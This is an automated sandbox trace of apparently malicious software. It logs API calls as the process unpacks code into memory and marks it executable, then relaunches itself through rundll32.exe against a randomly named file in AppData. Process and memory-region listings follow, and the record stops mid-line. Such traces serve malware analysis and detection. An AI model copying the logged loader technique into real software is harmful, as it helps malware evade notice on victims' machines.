(lpString="gcc-shmem-tdm2-idListMax_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0138.527] malloc (_Size=0x4) returned 0x5f29e8 [0138.527] AddAtomA (lpString="gcc-shmem-tdm2-idListMax_shmem-aaaaaaaaaaAaAAAAAaaAaAaaAAAAaAaa") returned 0xc00c [0138.527] GetAtomNameA (in: nAtom=0xc00c, lpBuffer=0x16f1b0, nSize=63 | out: lpBuffer="gcc-shmem-tdm2-idListMax_shmem-aaaaaaaaaaAaAAAAAaaAaAaaAAAAaAa") returned 0x3e [0138.527] ReleaseMutex (hMutex=0x13c) returned 1 [0138.527] CloseHandle (hObject=0x13c) returned 1 [0138.527] malloc (_Size=0x80) returned 0x5f29f8 [0138.527] strlen (_Str="idList_shmem") returned 0xc [0138.527] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-idList_shmem") returned 0x13c [0138.527] WaitForSingleObject (hHandle=0x13c, dwMilliseconds=0xffffffff) returned 0x0 [0138.527] FindAtomA (lpString="gcc-shmem-tdm2-idList_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0138.527] malloc (_Size=0x4) returned 0x5f2a80 [0138.527] AddAtomA (lpString="gcc-shmem-tdm2-idList_shmem-aaaaaaaaaaAaAAAAAaaAaAaAaAaaaaaa") returned 0xc00d [0138.527] GetAtomNameA (in: nAtom=0xc00d, lpBuffer=0x16f1b0, nSize=60 | out: lpBuffer="gcc-shmem-tdm2-idList_shmem-aaaaaaaaaaAaAAAAAaaAaAaAaAaaaaa") returned 0x3b [0138.527] ReleaseMutex (hMutex=0x13c) returned 1 [0138.527] CloseHandle (hObject=0x13c) returned 1 [0138.527] strlen (_Str="idListNextId_shmem") returned 0x12 [0138.527] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-idListNextId_shmem") returned 0x13c [0138.527] WaitForSingleObject (hHandle=0x13c, dwMilliseconds=0xffffffff) returned 0x0 [0138.527] FindAtomA (lpString="gcc-shmem-tdm2-idListNextId_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0138.527] malloc (_Size=0x4) returned 0x5f2a90 [0138.527] AddAtomA (lpString="gcc-shmem-tdm2-idListNextId_shmem-aaaaaaaaaaAaAAAAAaaAaAaAaAaaAaaa") returned 0xc00e [0138.527] GetAtomNameA (in: nAtom=0xc00e, lpBuffer=0x16f1a0, nSize=66 | out: lpBuffer="gcc-shmem-tdm2-idListNextId_shmem-aaaaaaaaaaAaAAAAAaaAaAaAaAaaAaa") returned 0x41 [0138.528] ReleaseMutex (hMutex=0x13c) returned 1 [0138.528] CloseHandle (hObject=0x13c) returned 1 [0138.528] GetCurrentThreadId () returned 0xde0 [0138.528] ReleaseSemaphore (in: hSemaphore=0x134, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0138.528] GetCurrentThreadId () returned 0xde0 [0138.528] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x13c [0138.528] GetCurrentProcess () returned 0xffffffff [0138.528] GetCurrentThread () returned 0xfffffffe [0138.528] GetCurrentProcess () returned 0xffffffff [0138.528] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5f2924, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5f2924*=0x140) returned 1 [0138.528] GetThreadPriority (hThread=0x140) returned 0 [0138.528] strlen (_Str="fc_key") returned 0x6 [0138.528] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-fc_key") returned 0x144 [0138.528] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0xffffffff) returned 0x0 [0138.528] FindAtomA (lpString="gcc-shmem-tdm2-fc_key-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0138.528] malloc (_Size=0x4) returned 0x5f2aa0 [0138.528] AddAtomA (lpString="gcc-shmem-tdm2-fc_key-aaaaaaaaaaAaAAAAAaaAaAaAaAaAaaaa") returned 0xc00f [0138.528] GetAtomNameA (in: nAtom=0xc00f, lpBuffer=0x16f230, nSize=55 | out: lpBuffer="gcc-shmem-tdm2-fc_key-aaaaaaaaaaAaAAAAAaaAaAaAaAaAaaaa") returned 0x36 [0138.528] ReleaseMutex (hMutex=0x144) returned 1 [0138.528] CloseHandle (hObject=0x144) returned 1 [0138.529] strlen (_Str="_pthread_key_lock_shmem") returned 0x17 [0138.529] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_key_lock_shmem") returned 0x144 [0138.529] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0xffffffff) returned 0x0 [0138.529] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_key_lock_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0138.529] malloc (_Size=0x4) returned 0x5f2ab0 [0138.529] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_key_lock_shmem-aaaaaaaaaaAaAAAAAaaAaAaAaAaAAaaa") returned 0xc010 [0138.529] GetAtomNameA (in: nAtom=0xc010, lpBuffer=0x16f1f0, nSize=71 | out: lpBuffer="gcc-shmem-tdm2-_pthread_key_lock_shmem-aaaaaaaaaaAaAAAAAaaAaAaAaAaAAaa") returned 0x46 [0138.529] ReleaseMutex (hMutex=0x144) returned 1 [0138.529] CloseHandle (hObject=0x144) returned 1 [0138.529] strlen (_Str="_pthread_cancelling_shmem") returned 0x19 [0138.529] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_cancelling_shmem") returned 0x144 [0138.529] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0xffffffff) returned 0x0 [0138.529] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_cancelling_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0138.529] malloc (_Size=0x4) returned 0x5f2ac0 [0138.529] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_cancelling_shmem-aaaaaaaaaaAaAAAAAaaAaAaAaAAaaaaa") returned 0xc011 [0138.529] GetAtomNameA (in: nAtom=0xc011, lpBuffer=0x16f190, nSize=73 | out: lpBuffer="gcc-shmem-tdm2-_pthread_cancelling_shmem-aaaaaaaaaaAaAAAAAaaAaAaAaAAaaaa") returned 0x48 [0138.530] ReleaseMutex (hMutex=0x144) returned 1 [0138.530] CloseHandle (hObject=0x144) returned 1 [0138.530] strlen (_Str="cond_locked_shmem_rwlock") returned 0x18 [0138.530] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-cond_locked_shmem_rwlock") returned 0x144 [0138.530] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0xffffffff) returned 0x0 [0138.530] FindAtomA (lpString="gcc-shmem-tdm2-cond_locked_shmem_rwlock-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0138.530] malloc (_Size=0x10) returned 0x5f2ad0 [0138.530] AddAtomA (lpString="gcc-shmem-tdm2-cond_locked_shmem_rwlock-aaaaaaaaaaAaAAAAAaaAaAaAaAAaAaaa") returned 0xc012 [0138.530] GetAtomNameA (in: nAtom=0xc012, lpBuffer=0x16f170, nSize=72 | out: lpBuffer="gcc-shmem-tdm2-cond_locked_shmem_rwlock-aaaaaaaaaaAaAAAAAaaAaAaAaAAaAaa") returned 0x47 [0138.530] ReleaseMutex (hMutex=0x144) returned 1 [0138.530] CloseHandle (hObject=0x144) returned 1 [0138.530] calloc (_Count=0x1, _Size=0x20) returned 0x5f2ae8 [0138.530] calloc (_Count=0x1, _Size=0x1c) returned 0x5f2b10 [0138.530] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=1, lMaximumCount=2147483647, lpName=0x0) returned 0x144 [0138.530] calloc (_Count=0x1, _Size=0x1c) returned 0x5f2b38 [0138.530] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=1, lMaximumCount=2147483647, lpName=0x0) returned 0x148 [0138.530] calloc (_Count=0x1, _Size=0x6c) returned 0x5f2b60 [0138.530] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=0, lMaximumCount=2147483647, lpName=0x0) returned 0x14c [0138.530] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=0, lMaximumCount=2147483647, lpName=0x0) returned 0x150 [0138.530] strlen (_Str="rwl_global_shmem") returned 0x10 [0138.531] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-rwl_global_shmem") returned 0x154 [0138.531] WaitForSingleObject (hHandle=0x154, dwMilliseconds=0xffffffff) returned 0x0 [0138.531] FindAtomA (lpString="gcc-shmem-tdm2-rwl_global_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0138.531] malloc (_Size=0x10) returned 0x5f2bd8 [0138.531] AddAtomA (lpString="gcc-shmem-tdm2-rwl_global_shmem-aaaaaaaaaaAaAAAAAaaAaAaAAAAaAAaa") returned 0xc013 [0138.531] GetAtomNameA (in: nAtom=0xc013, lpBuffer=0x16f190, nSize=64 | out: lpBuffer="gcc-shmem-tdm2-rwl_global_shmem-aaaaaaaaaaAaAAAAAaaAaAaAAAAaAAa") returned 0x3f [0138.531] ReleaseMutex (hMutex=0x154) returned 1 [0138.531] CloseHandle (hObject=0x154) returned 1 [0138.531] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0xffffffff) returned 0x0 [0138.531] GetCurrentThreadId () returned 0xde0 [0138.531] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0xffffffff) returned 0x0 [0138.531] GetCurrentThreadId () returned 0xde0 [0138.531] strlen (_Str="_pthread_key_sch_shmem") returned 0x16 [0138.531] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_key_sch_shmem") returned 0x154 [0138.531] WaitForSingleObject (hHandle=0x154, dwMilliseconds=0xffffffff) returned 0x0 [0138.531] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_key_sch_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0138.531] malloc (_Size=0x4) returned 0x5f2bf0 [0138.532] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_key_sch_shmem-aaaaaaaaaaAaAAAAAaaAaAaAAAAAAaaa") returned 0xc014 [0138.532] GetAtomNameA (in: nAtom=0xc014, lpBuffer=0x16f1f0, nSize=70 | out: lpBuffer="gcc-shmem-tdm2-_pthread_key_sch_shmem-aaaaaaaaaaAaAAAAAaaAaAaAAAAAAaa") returned 0x45 [0138.532] ReleaseMutex (hMutex=0x154) returned 1 [0138.532] CloseHandle (hObject=0x154) returned 1 [0138.532] strlen (_Str="_pthread_key_max_shmem") returned 0x16 [0138.532] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_key_max_shmem") returned 0x154 [0138.532] WaitForSingleObject (hHandle=0x154, dwMilliseconds=0xffffffff) returned 0x0 [0138.532] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_key_max_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0138.532] malloc (_Size=0x4) returned 0x5f2c00 [0138.532] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_key_max_shmem-aaaaaaaaaaAaAAAAAaaAaAAaaaaaaaaa") returned 0xc015 [0138.532] GetAtomNameA (in: nAtom=0xc015, lpBuffer=0x16f1f0, nSize=70 | out: lpBuffer="gcc-shmem-tdm2-_pthread_key_max_shmem-aaaaaaaaaaAaAAAAAaaAaAAaaaaaaaa") returned 0x45 [0138.532] ReleaseMutex (hMutex=0x154) returned 1 [0138.532] CloseHandle (hObject=0x154) returned 1 [0138.532] strlen (_Str="_pthread_key_dest_shmem") returned 0x17 [0138.532] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_key_dest_shmem") returned 0x154 [0138.532] WaitForSingleObject (hHandle=0x154, dwMilliseconds=0xffffffff) returned 0x0 [0138.532] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_key_dest_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0138.532] malloc (_Size=0x4) returned 0x5f2c10 [0138.533] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_key_dest_shmem-aaaaaaaaaaAaAAAAAaaAaAAaaaaaAaaa") returned 0xc016 [0138.533] GetAtomNameA (in: nAtom=0xc016, lpBuffer=0x16f1f0, nSize=71 | out: lpBuffer="gcc-shmem-tdm2-_pthread_key_dest_shmem-aaaaaaaaaaAaAAAAAaaAaAAaaaaaAaa") returned 0x46 [0138.533] ReleaseMutex (hMutex=0x154) returned 1 [0138.533] CloseHandle (hObject=0x154) returned 1 [0138.534] realloc (_Block=0x0, _Size=0x4) returned 0x5f2c38 [0138.534] ReleaseSemaphore (in: hSemaphore=0x148, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0138.534] ReleaseSemaphore (in: hSemaphore=0x144, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0138.534] ReleaseSemaphore (in: hSemaphore=0x138, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0138.534] CloseHandle (hObject=0x138) returned 1 [0138.534] free (_Block=0x5f2850) [0138.534] free (_Block=0x5f1490) [0138.534] GetLastError () returned 0x0 [0138.534] SetLastError (dwErrCode=0x0) [0138.534] GetLastError () returned 0x0 [0138.534] realloc (_Block=0x0, _Size=0x4) returned 0x5f2c48 [0138.534] realloc (_Block=0x0, _Size=0x1) returned 0x5f2c58 [0138.534] SetLastError (dwErrCode=0x0) [0138.534] GetNativeSystemInfo (in: lpSystemInfo=0x16f398 | out: lpSystemInfo=0x16f398*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0138.534] VirtualAlloc (lpAddress=0x10000000, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x10000000 [0138.534] GetProcessHeap () returned 0x310000 [0138.535] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x34) returned 0x3855b0 [0138.535] VirtualAlloc (lpAddress=0x10000000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x10000000 [0138.535] VirtualAlloc (lpAddress=0x10001000, dwSize=0x22400, flAllocationType=0x1000, flProtect=0x4) returned 0x10001000 [0138.537] VirtualAlloc (lpAddress=0x10024000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0x10024000 [0138.537] VirtualAlloc (lpAddress=0x10025000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x10025000 [0138.538] VirtualAlloc (lpAddress=0x10026000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x10026000 [0138.538] GetLastError () returned 0x0 [0138.538] SetLastError (dwErrCode=0x0) [0138.538] GetLastError () returned 0x0 [0138.538] SetLastError (dwErrCode=0x0) [0138.538] GetLastError () returned 0x0 [0138.538] SetLastError (dwErrCode=0x0) [0138.538] GetLastError () returned 0x0 [0138.538] SetLastError (dwErrCode=0x0) [0138.538] VirtualProtect (in: lpAddress=0x10001000, dwSize=0x22400, flNewProtect=0x20, lpflOldProtect=0x16f270 | out: lpflOldProtect=0x16f270*=0x4) returned 1 [0138.543] GetLastError () returned 0x0 [0138.543] SetLastError (dwErrCode=0x0) [0138.543] GetLastError () returned 0x0 [0138.543] SetLastError (dwErrCode=0x0) [0138.543] GetLastError () returned 0x0 [0138.543] SetLastError (dwErrCode=0x0) [0138.543] VirtualProtect (in: lpAddress=0x10024000, dwSize=0x200, flNewProtect=0x2, lpflOldProtect=0x16f270 | out: lpflOldProtect=0x16f270*=0x4) returned 1 [0138.543] GetLastError () returned 0x0 [0138.543] SetLastError (dwErrCode=0x0) [0138.543] GetLastError () returned 0x0 [0138.544] SetLastError (dwErrCode=0x0) [0138.544] GetLastError () returned 0x0 [0138.544] SetLastError (dwErrCode=0x0) [0138.544] VirtualProtect (in: lpAddress=0x10025000, dwSize=0x400, flNewProtect=0x4, lpflOldProtect=0x16f270 | out: lpflOldProtect=0x16f270*=0x4) returned 1 [0138.544] GetLastError () returned 0x0 [0138.544] SetLastError (dwErrCode=0x0) [0138.544] GetLastError () returned 0x0 [0138.544] SetLastError (dwErrCode=0x0) [0138.544] GetLastError () returned 0x0 [0138.544] SetLastError (dwErrCode=0x0) [0138.544] VirtualFree (lpAddress=0x10026000, dwSize=0x400, dwFreeType=0x4000) returned 1 [0138.578] GetLastError () returned 0x0 [0138.578] SetLastError (dwErrCode=0x0) [0138.578] GetLastError () returned 0x0 [0138.578] SetLastError (dwErrCode=0x0) [0138.579] GetCommandLineW () returned="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",QxrXksBkO" [0138.579] GetProcessHeap () returned 0x310000 [0138.579] GetModuleHandleA (lpModuleName="NTDLL") returned 0x779e0000 [0138.579] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x28) returned 0x38f5f0 [0138.580] lstrcmpiW (lpString1="QxrXksBkO", lpString2="DllRegisterServer") returned 1 [0138.580] GetProcessHeap () returned 0x310000 [0138.581] HeapFree (in: hHeap=0x310000, dwFlags=0x0, lpMem=0x38f5f0 | out: hHeap=0x310000) returned 1 [0138.581] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x16f11c | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0138.587] GetModuleFileNameW (in: hModule=0x6ab00000, lpFilename=0x16ef14, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\oxeedtbi\\tfnfdhfu.kqr")) returned 0x36 [0138.587] GetProcessHeap () returned 0x310000 [0138.587] RtlAllocateHeap (HeapHandle=0x310000, Flags=0x8, Size=0x50) returned 0x3b22c8 [0138.587] _snwprintf (in: _Dest=0x311bb0, _Count=0x104, _Format="%s\\rundll32.exe \"%s\",DllRegisterServer" | out: _Dest="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",DllRegisterServer") returned 107 [0138.587] GetProcessHeap () returned 0x310000 [0138.588] HeapFree (in: hHeap=0x310000, dwFlags=0x0, lpMem=0x3b22c8 | out: hHeap=0x310000) returned 1 [0138.588] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",DllRegisterServer", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x16eb8c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x16ebd0 | out: lpCommandLine="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",DllRegisterServer", lpProcessInformation=0x16ebd0*(hProcess=0x158, hThread=0x154, dwProcessId=0xe20, dwThreadId=0xe24)) returned 1 [0138.698] CloseHandle (hObject=0x158) returned 1 [0138.698] CloseHandle (hObject=0x154) returned 1 [0138.698] ExitProcess (uExitCode=0x0) Process: id = "6" image_name = "rundll32.exe" filename = "c:\\windows\\syswow64\\rundll32.exe" page_root = "0x21b5e000" os_pid = "0xe20" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0xddc" cmd_line = "C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",DllRegisterServer" cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1754 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1755 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1756 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1757 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1758 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1759 start_va = 0xf0000 end_va = 0xfdfff monitored = 0 entry_point = 0xf178c region_type = mapped_file name = "rundll32.exe" filename = "\\Windows\\SysWOW64\\rundll32.exe" (normalized: "c:\\windows\\syswow64\\rundll32.exe") Region: id = 1760 start_va = 0x1a0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1761 start_va = 0x290000 end_va = 0x2cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 1762 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1763 start_va = 0x779e0000 end_va = 0x77b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1764 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1765 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1766 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1767 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1768 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1769 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1770 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1771 start_va = 0x70000 end_va = 0x71fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 1772 start_va = 0x100000 end_va = 0x100fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1773 start_va = 0x3c0000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 1774 start_va = 0x75250000 end_va = 0x75257fff monitored = 0 entry_point = 0x752520f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1775 start_va = 0x75260000 end_va = 0x752bbfff monitored = 0 entry_point = 0x7529f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1776 start_va = 0x752c0000 end_va = 0x752fefff monitored = 0 entry_point = 0x752ee088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1777 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1778 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1779 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1780 start_va = 0x776e0000 end_va = 0x777fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000776e0000" filename = "" Region: id = 1781 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1782 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 1783 start_va = 0x440000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 1784 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1785 start_va = 0x76fe0000 end_va = 0x77026fff monitored = 0 entry_point = 0x76fe74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1786 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1787 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1788 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1789 start_va = 0x80000 end_va = 0xe6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1790 start_va = 0x72950000 end_va = 0x72b04fff monitored = 0 entry_point = 0x72a43d5a region_type = mapped_file name = "appvisvsubsystems32.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems32.dll") Region: id = 1791 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1792 start_va = 0x72c50000 end_va = 0x72cb4fff monitored = 0 entry_point = 0x72c6fa6c region_type = mapped_file name = "appvisvstream32.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvStream32.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream32.dll") Region: id = 1793 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1794 start_va = 0x72b80000 end_va = 0x72c4afff monitored = 0 entry_point = 0x72b96a2b region_type = mapped_file name = "c2r32.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\C2R32.dll" (normalized: "c:\\program files\\common files\\microsoft 